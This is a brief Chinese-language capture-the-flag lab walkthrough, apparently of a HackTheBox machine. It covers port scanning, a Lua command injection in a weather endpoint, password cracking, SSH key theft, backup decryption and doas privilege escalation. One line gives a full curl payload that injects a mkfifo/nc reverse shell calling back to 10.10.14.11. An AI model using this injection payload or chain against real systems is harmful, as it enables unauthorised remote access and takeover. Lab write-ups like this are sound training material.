nmap扫描
80端口扫到个robots.txt
发现一个目录
扫一下
这貌似是要加上这个参数
输出了一堆城市名
报错了
貌似不是注入
搜了半天,这貌似是个RCE
在后面拼接需要执行的命令
反弹个shell
在这执行貌似不行,得用curl
curl -G --data-urlencode "city=') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 7777 >/tmp/f') --" 'http://10.10.10.218/weather/forecast' -s
提权
在网站目录下发现.htpasswd文件
貌似是个加密密码,爆破一下
看看9001端口
输入刚刚爆破出来的密码,但是无法登录
80端口倒是登录上了,没什么可利用信息
用curl请求本地的提权检测脚本执行
在靶机本地开放了3000和3001端口,curl请求看看
还检测到r.michaels用户可以以root权限运行doas
9001端口的账号密码,尝试登录
没有RCE
401错误,尝试带入之前爆破而来的账号密码
貌似就是80端口的信息,在看看3001
还是一样,搜了一下,貌似是要带上r.michaels的家目录路径
发现一个id_rsa密钥,可能是r.michaels用户的
复制到本地,尝试连接
发现一个backups目录
devel_backup-2020-09-16.tar.gz.enc貌似是个加密的压缩包
解密netpgp --decrypt --output=/tmp/backup.tar.gz devel_backup-2020-09-16.tar.gz.enc
解压
解压后在www目录下发现.htpasswd
继续爆破
之前脚本检测到一个doas.conf文档,搜一下
可以以root权限执行doas文件
尝试输入刚刚破解的密码